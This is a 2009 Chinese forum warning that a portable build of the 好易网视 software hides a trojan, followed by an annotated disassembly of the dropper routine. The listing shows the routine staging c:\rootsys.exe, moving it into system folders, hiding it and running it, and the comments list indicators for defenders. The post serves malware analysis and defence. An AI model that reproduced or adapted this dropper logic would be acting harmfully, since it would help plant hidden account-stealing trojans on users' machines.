pxf
发表于 2009-1-13 01:49
又发现一病毒。请大家注意绿色版本的“好易网视”软件，其软件捆绑了木马！软件运行时会自动释放 winrar.exe 盗号木马到系统目录下！
解决方法：用 OD 或 WinHex 载入，直接删除木马。
以下是部分记录:------------------------
; ======================================================================
; Dropper routine at 00403850 (OllyDbg-style listing, Intel syntax, 32-bit
; x86, stdcall Win32 imports). The 好易网视.004xxxxx helpers look like
; Delphi RTL string routines; their roles below are inferred — confirm
; against the RTL before relying on them.
; Behaviour visible in this listing:
;   1. GetModuleFileName -> path of this EXE; 004036F4 locates an embedded
;      payload in it ([ebp-C] = data pointer, [ebp-4] = end offset), al != 0
;      on success.
;   2. For each record (0x40-byte header + body of length header+0x38):
;      pick a target directory from header byte +0x33 (drive root / system
;      dir / Windows dir / temp), build target path = dir + name, write the
;      body to c:\rootsys.exe, optionally MoveFileA it to the target path,
;      SetFileAttributes(HIDDEN), DeleteFileA the staging file, then
;      ShellExecuteA("open") the target.
; Register roles: edi = 0x104-byte path buffer, ebx = current record
;   offset into the payload, esi = scratch / file handle.
; Indicators a defender can watch for, all visible here: creation of
;   c:\rootsys.exe, MoveFileA into system/Windows/temp, hidden attribute,
;   ShellExecuteA("open") of the moved file.
; ======================================================================
00403850 55 push ebp                                         ; frame setup
00403851 8BEC mov ebp,esp
00403853 81C4 8CFEFFFF add esp,-174                          ; 0x174 bytes of locals
00403859 53 push ebx                                         ; save callee-saved regs
0040385A 56 push esi
0040385B 57 push edi
0040385C 33C0 xor eax,eax
0040385E 8985 8CFEFFFF mov dword ptr ss:[ebp-174],eax        ; zero the locals that 00402F80 releases at 00403B03
00403864 8985 90FEFFFF mov dword ptr ss:[ebp-170],eax        ;  (ebp-174..-168 and ebp-18..-10; string handles, presumably)
0040386A 8985 94FEFFFF mov dword ptr ss:[ebp-16C],eax
00403870 8985 98FEFFFF mov dword ptr ss:[ebp-168],eax
00403876 8945 F0 mov dword ptr ss:[ebp-10],eax
00403879 8945 EC mov dword ptr ss:[ebp-14],eax
0040387C 8945 E8 mov dword ptr ss:[ebp-18],eax
0040387F 33C0 xor eax,eax
00403881 55 push ebp                                         ; install SEH frame, handler = 00403B21
00403882 68 213B4000 push 好易网视.00403B21                    ;  (Delphi-style try/finally — confirm)
00403887 64:FF30 push dword ptr fs:[eax]                     ; save previous fs:[0]
0040388A 64:8920 mov dword ptr fs:[eax],esp
0040388D B8 04010000 mov eax,104                             ; 0x104 = MAX_PATH buffer size
00403892 E8 A1EBFFFF call 好易网视.00402438                    ; presumably allocates 0x104 bytes; released at 00403AF1
00403897 8BF8 mov edi,eax                                    ; edi = path buffer
00403899 68 04010000 push 104                                ; nSize
0040389E 57 push edi                                         ; lpFilename
0040389F 6A 00 push 0
004038A1 E8 96FDFFFF call <jmp.&kernel32.GetModuleHandle>    ; GetModuleHandle(NULL) = own image
004038A6 50 push eax                                         ; hModule
004038A7 E8 88FDFFFF call <jmp.&kernel32.GetModuleFileNa>    ; edi = full path of this EXE
004038AC 8D85 98FEFFFF lea eax,dword ptr ss:[ebp-168]
004038B2 8BD7 mov edx,edi
004038B4 E8 97F7FFFF call 好易网视.00403050                    ; presumably [ebp-168] = string(edi)
004038B9 8B85 98FEFFFF mov eax,dword ptr ss:[ebp-168]        ; own EXE path
004038BF 8D4D FC lea ecx,dword ptr ss:[ebp-4]                ; out: payload end offset (loop limit at 00403AE6)
004038C2 8D55 F4 lea edx,dword ptr ss:[ebp-C]                ; out: pointer to payload data
004038C5 E8 2AFEFFFF call 好易网视.004036F4                    ; locate embedded payload in own file — confirm by reading 004036F4
004038CA 84C0 test al,al
004038CC 0F84 1D020000 je 好易网视.00403AEF                   ; nothing found -> cleanup and return
004038D2 33DB xor ebx,ebx                                    ; ebx = record offset, starts at 0
004038D4 8D85 DFFEFFFF lea eax,dword ptr ss:[ebp-121]        ; LOOP HEAD: one record per iteration
004038DA BA 05010000 mov edx,105
004038DF E8 A0FDFFFF call 好易网视.00403684                    ; presumably clears the 0x105-byte path buffer
004038E4 8D85 9CFEFFFF lea eax,dword ptr ss:[ebp-164]
004038EA BA 40000000 mov edx,40
004038EF E8 90FDFFFF call 好易网视.00403684                    ; presumably clears the 0x40-byte header copy
004038F4 8B45 F4 mov eax,dword ptr ss:[ebp-C]
004038F7 03C3 add eax,ebx                                    ; eax = payload + ebx = current record
004038F9 57 push edi                                         ; keep path buffer across rep movsd
004038FA 8BF0 mov esi,eax
004038FC 8DBD 9CFEFFFF lea edi,dword ptr ss:[ebp-164]
00403902 B9 10000000 mov ecx,10
00403907 F3:A5 rep movsd                                     ; copy 16 dwords = 0x40-byte record header to [ebp-164]
00403909 5F pop edi
0040390A 8D45 F0 lea eax,dword ptr ss:[ebp-10]
0040390D 8D95 9CFEFFFF lea edx,dword ptr ss:[ebp-164]
00403913 E8 68F7FFFF call 好易网视.00403080                    ; presumably [ebp-10] = string(header) = drop file name (winrar.exe per the post)
00403918 8A85 CFFEFFFF mov al,byte ptr ss:[ebp-131]          ; header byte +0x33 = target-directory selector
0040391E 2C 01 sub al,1
00403920 0F82 B4000000 jb 好易网视.004039DA                   ; 0 -> Windows drive root (004039DA)
00403926 74 11 je short 好易网视.00403939                      ; 1 -> system directory
00403928 FEC8 dec al
0040392A 74 4C je short 好易网视.00403978                      ; 2 -> Windows directory
0040392C FEC8 dec al
0040392E 0F84 80000000 je 好易网视.004039B4                   ; 3 -> temp path
00403934 E9 E1000000 jmp 好易网视.00403A1A                    ; other -> [ebp-18] keeps its previous value
00403939 68 04010000 push 104                                ; case 1: GetSystemDirectory(buf, 0x104)
0040393E 8D85 DFFEFFFF lea eax,dword ptr ss:[ebp-121]
00403944 50 push eax
00403945 E8 FAFCFFFF call <jmp.&kernel32.GetSystemDirect>
0040394A 8D85 94FEFFFF lea eax,dword ptr ss:[ebp-16C]
00403950 8D95 DFFEFFFF lea edx,dword ptr ss:[ebp-121] ; system directory
00403956 B9 05010000 mov ecx,105
0040395B E8 2CF7FFFF call 好易网视.0040308C                    ; presumably [ebp-16C] = string(buf, max 0x105)
00403960 8B95 94FEFFFF mov edx,dword ptr ss:[ebp-16C]
00403966 8D45 E8 lea eax,dword ptr ss:[ebp-18]
00403969 B9 383B4000 mov ecx,好易网视.00403B38 ; \
0040396E E8 75F7FFFF call 好易网视.004030E8                    ; presumably concat: [ebp-18] = sysdir + "\"
00403973 E9 A2000000 jmp 好易网视.00403A1A
00403978 68 04010000 push 104                                ; case 2: GetWindowsDirectory(buf, 0x104)
0040397D 8D85 DFFEFFFF lea eax,dword ptr ss:[ebp-121]
00403983 50 push eax
00403984 E8 CBFCFFFF call <jmp.&kernel32.GetWindowsDirec>
00403989 8D85 90FEFFFF lea eax,dword ptr ss:[ebp-170]
0040398F 8D95 DFFEFFFF lea edx,dword ptr ss:[ebp-121]        ; Windows directory
00403995 B9 05010000 mov ecx,105
0040399A E8 EDF6FFFF call 好易网视.0040308C                    ; presumably [ebp-170] = string(buf, max 0x105)
0040399F 8B95 90FEFFFF mov edx,dword ptr ss:[ebp-170]
004039A5 8D45 E8 lea eax,dword ptr ss:[ebp-18]
004039A8 B9 383B4000 mov ecx,好易网视.00403B38 ; \
004039AD E8 36F7FFFF call 好易网视.004030E8                    ; presumably concat: [ebp-18] = windir + "\"
004039B2 EB 66 jmp short 好易网视.00403A1A
004039B4 8D85 DFFEFFFF lea eax,dword ptr ss:[ebp-121]        ; case 3: GetTempPathA(0x104, buf)
004039BA 50 push eax                                         ; lpBuffer
004039BB 68 04010000 push 104                                ; nBufferLength
004039C0 E8 87FCFFFF call <jmp.&kernel32.GetTempPathA>
004039C5 8D45 E8 lea eax,dword ptr ss:[ebp-18]
004039C8 8D95 DFFEFFFF lea edx,dword ptr ss:[ebp-121]
004039CE B9 05010000 mov ecx,105
004039D3 E8 B4F6FFFF call 好易网视.0040308C                    ; presumably [ebp-18] = string(buf); no separator appended here
004039D8 EB 40 jmp short 好易网视.00403A1A
004039DA 68 04010000 push 104                                ; case 0: GetWindowsDirectory(buf, 0x104)
004039DF 8D85 DFFEFFFF lea eax,dword ptr ss:[ebp-121]
004039E5 50 push eax
004039E6 E8 69FCFFFF call <jmp.&kernel32.GetWindowsDirec>
004039EB 8D45 E8 lea eax,dword ptr ss:[ebp-18]
004039EE 50 push eax                                         ; result slot for the 00403178 call below
004039EF 8D85 8CFEFFFF lea eax,dword ptr ss:[ebp-174]
004039F5 8D95 DFFEFFFF lea edx,dword ptr ss:[ebp-121]
004039FB B9 05010000 mov ecx,105
00403A00 E8 87F6FFFF call 好易网视.0040308C                    ; presumably [ebp-174] = string(buf)
00403A05 8B85 8CFEFFFF mov eax,dword ptr ss:[ebp-174]
00403A0B B9 03000000 mov ecx,3
00403A10 BA 01000000 mov edx,1
00403A15 E8 5EF7FFFF call 好易网视.00403178                    ; looks like Copy(windir, 1, 3) -> drive root into [ebp-18] — confirm
00403A1A 8D45 EC lea eax,dword ptr ss:[ebp-14]               ; MERGE: build the final drop path
00403A1D 8B4D F0 mov ecx,dword ptr ss:[ebp-10]               ; file name from the record header
00403A20 8B55 E8 mov edx,dword ptr ss:[ebp-18] ; target directory chosen above (post: drops the winrar.exe trojan into the system directory)
00403A23 E8 C0F6FFFF call 好易网视.004030E8                    ; same helper as 0040396E: [ebp-14] = dir + name
00403A28 8B45 F4 mov eax,dword ptr ss:[ebp-C]
00403A2B 8D4418 40 lea eax,dword ptr ds:[eax+ebx+40]         ; record body follows the 0x40-byte header
00403A2F 8945 F8 mov dword ptr ss:[ebp-8],eax                ; [ebp-8] = body pointer
00403A32 8D45 F8 lea eax,dword ptr ss:[ebp-8]
00403A35 8B8D D8FEFFFF mov ecx,dword ptr ss:[ebp-128]        ; header dword +0x3C (role not visible here)
00403A3B 8B95 D4FEFFFF mov edx,dword ptr ss:[ebp-12C]        ; header dword +0x38 = body length (WriteFile size and record stride)
00403A41 E8 86FCFFFF call 好易网视.004036CC                    ; presumably transforms/decodes the body in place — confirm
00403A46 6A 00 push 0                                        ; hTemplateFile
00403A48 6A 00 push 0                                        ; dwFlagsAndAttributes
00403A4A 6A 02 push 2                                        ; CREATE_ALWAYS
00403A4C 6A 00 push 0                                        ; lpSecurityAttributes
00403A4E 6A 02 push 2                                        ; FILE_SHARE_WRITE
00403A50 68 00000040 push 40000000                           ; GENERIC_WRITE
00403A55 68 3C3B4000 push 好易网视.00403B3C ; c:\rootsys.exe  (hard-coded staging path)
00403A5A E8 BDFBFFFF call <jmp.&kernel32.CreateFileA>
00403A5F 8BF0 mov esi,eax                                    ; esi = file handle
00403A61 83FE FF cmp esi,-1                                  ; INVALID_HANDLE_VALUE?
00403A64 75 0D jnz short 好易网视.00403A73
00403A66 8B85 D4FEFFFF mov eax,dword ptr ss:[ebp-12C]        ; create failed: skip this record
00403A6C 83C0 40 add eax,40
00403A6F 03D8 add ebx,eax                                    ; ebx += body length + 0x40
00403A71 EB 73 jmp short 好易网视.00403AE6
00403A73 6A 00 push 0                                        ; lpOverlapped
00403A75 8D45 E4 lea eax,dword ptr ss:[ebp-1C]
00403A78 50 push eax                                         ; lpNumberOfBytesWritten
00403A79 8B85 D4FEFFFF mov eax,dword ptr ss:[ebp-12C]
00403A7F 50 push eax                                         ; nNumberOfBytesToWrite = body length
00403A80 8B45 F8 mov eax,dword ptr ss:[ebp-8]
00403A83 50 push eax                                         ; lpBuffer = body
00403A84 56 push esi                                         ; hFile
00403A85 E8 F2FBFFFF call <jmp.&kernel32.WriteFile>          ; return value is not checked
00403A8A 56 push esi
00403A8B E8 84FBFFFF call <jmp.&kernel32.CloseHandle>
00403A90 80BD D0FEFFFF 00 cmp byte ptr ss:[ebp-130],0        ; header byte +0x34: move-to-target flag
00403A97 74 13 je short 好易网视.00403AAC
00403A99 8B45 EC mov eax,dword ptr ss:[ebp-14]
00403A9C E8 CBF6FFFF call 好易网视.0040316C                    ; presumably PChar(drop path)
00403AA1 50 push eax                                         ; lpNewFileName = drop path
00403AA2 68 3C3B4000 push 好易网视.00403B3C ; c:\rootsys.exe  (lpExistingFileName)
00403AA7 E8 B0FBFFFF call <jmp.&kernel32.MoveFileA>          ; move the staged file into the chosen directory
00403AAC 6A 02 push 2                                        ; FILE_ATTRIBUTE_HIDDEN
00403AAE 8B45 EC mov eax,dword ptr ss:[ebp-14]
00403AB1 E8 B6F6FFFF call 好易网视.0040316C ; set the trojan's run path (esi = PChar(drop path))
00403AB6 8BF0 mov esi,eax
00403AB8 56 push esi
00403AB9 E8 AEFBFFFF call <jmp.&kernel32.SetFileAttribut>    ; hide the dropped file
00403ABE 68 3C3B4000 push 好易网视.00403B3C ; c:\rootsys.exe
00403AC3 E8 5CFBFFFF call <jmp.&kernel32.DeleteFileA>        ; remove the staging file (fails harmlessly if already moved)
00403AC8 6A 01 push 1                                        ; nShowCmd = SW_SHOWNORMAL
00403ACA 6A 00 push 0                                        ; lpDirectory
00403ACC 6A 00 push 0                                        ; lpParameters
00403ACE 56 push esi                                         ; lpFile = drop path
00403ACF 68 4C3B4000 push 好易网视.00403B4C ; open (starts the dropped file)
00403AD4 6A 00 push 0                                        ; hwnd
00403AD6 E8 E9FBFFFF call <jmp.&shell32.ShellExecuteA>
00403ADB 8B85 D4FEFFFF mov eax,dword ptr ss:[ebp-12C]
00403AE1 83C0 40 add eax,40
00403AE4 03D8 add ebx,eax                                    ; ebx += body length + 0x40 -> next record
00403AE6 3B5D FC cmp ebx,dword ptr ss:[ebp-4]                ; LOOP TAIL: offset < payload end?
00403AE9 ^ 0F82 E5FDFFFF jb 好易网视.004038D4                 ; unsigned compare; loop back to 004038D4
00403AEF 8BC7 mov eax,edi
00403AF1 E8 62E9FFFF call 好易网视.00402458                    ; presumably frees the path buffer from 00402438
00403AF6 33C0 xor eax,eax
00403AF8 5A pop edx                                          ; saved fs:[0]
00403AF9 59 pop ecx                                          ; handler address
00403AFA 59 pop ecx                                          ; saved ebp
00403AFB 64:8910 mov dword ptr fs:[eax],edx                  ; restore previous SEH frame
00403AFE 68 283B4000 push 好易网视.00403B28                    ; return address for the finaliser: retn at 00403B20 lands on the epilogue
00403B03 8D85 8CFEFFFF lea eax,dword ptr ss:[ebp-174]        ; FINALLY: release the locals zeroed in the prologue
00403B09 BA 04000000 mov edx,4                               ; looks like a count: ebp-174..-168
00403B0E E8 6DF4FFFF call 好易网视.00402F80
00403B13 8D45 E8 lea eax,dword ptr ss:[ebp-18]
00403B16 BA 03000000 mov edx,3                               ; looks like a count: ebp-18..-10
00403B1B E8 60F4FFFF call 好易网视.00402F80
00403B20 C3 retn                                             ; pops the pushed 00403B28 -> epilogue
00403B21 ^ E9 D2EEFFFF jmp 好易网视.004029F8                  ; SEH handler installed at 00403882 — presumably RTL exception dispatch
00403B26 ^ EB DB jmp short 好易网视.00403B03                  ; exception path re-enters the finaliser
00403B28 5F pop edi                                          ; EPILOGUE: restore callee-saved regs, then retn at 00403B2E
00403B29 5E pop esi
00403B2A 5B pop ebx
00403B2B 8BE5 mov esp,ebp
00403B2D 5D pop ebp
00403B2E C3 retn |